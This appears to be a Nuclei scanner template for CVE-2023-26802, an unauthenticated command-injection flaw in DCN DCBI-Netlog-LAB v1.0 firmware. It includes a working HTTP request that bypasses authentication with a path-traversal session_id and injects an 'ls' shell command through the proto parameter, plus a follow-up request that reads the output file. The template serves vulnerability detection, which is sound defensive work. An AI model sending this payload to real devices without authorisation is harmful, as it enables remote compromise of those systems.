id: CVE-2023-26802 info: name: DCBI-Netlog-LAB v1.0 - Command Injection author: pussycat0x severity: critical description: | An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request. impact: | Unauthenticated attackers can bypass authentication and execute arbitrary OS commands on the DCN DCBI-Netlog-LAB device, leading to complete device compromise and potential network infiltration. remediation: | Upgrade to the latest firmware version from DCN that addresses this command injection vulnerability, or apply vendor-provided security patches. reference: - https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-26802 cwe-id: CWE-22 epss-score: 0.4871 epss-percentile: 0.98723 cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:* metadata: vendor: dcnglobal product: dcbi-netlog-lab_firmware tags: cve,cve2023,rce,unauth,netlog,vkev,vuln variables: file_name: "{{rand_text_alpha(4)}}.html" http: - raw: - | GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1 Host: {{Hostname}} DNT: 1 X-Forwarded-For: 8.8.8.8 - | GET /{{file_name}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded DNT: 1 X-Forwarded-For: 8.8.8.8 matchers-condition: and matchers: - type: word part: body_2 words: - "nsg_bridge.cgi" - "nsg_dhcpactiveip.cgi" condition: and - type: status status: - 200 # digest: 490a0046304402202eddb61d3693ca802572fe4814fb0d5d68336063d79985982d8ab30fcee6e56902202d26cc1e481f2676d67683b56e96d40caed0a5204f576f0999270eba4f5bdda0:922c64590222798bb761d5b6d8e72950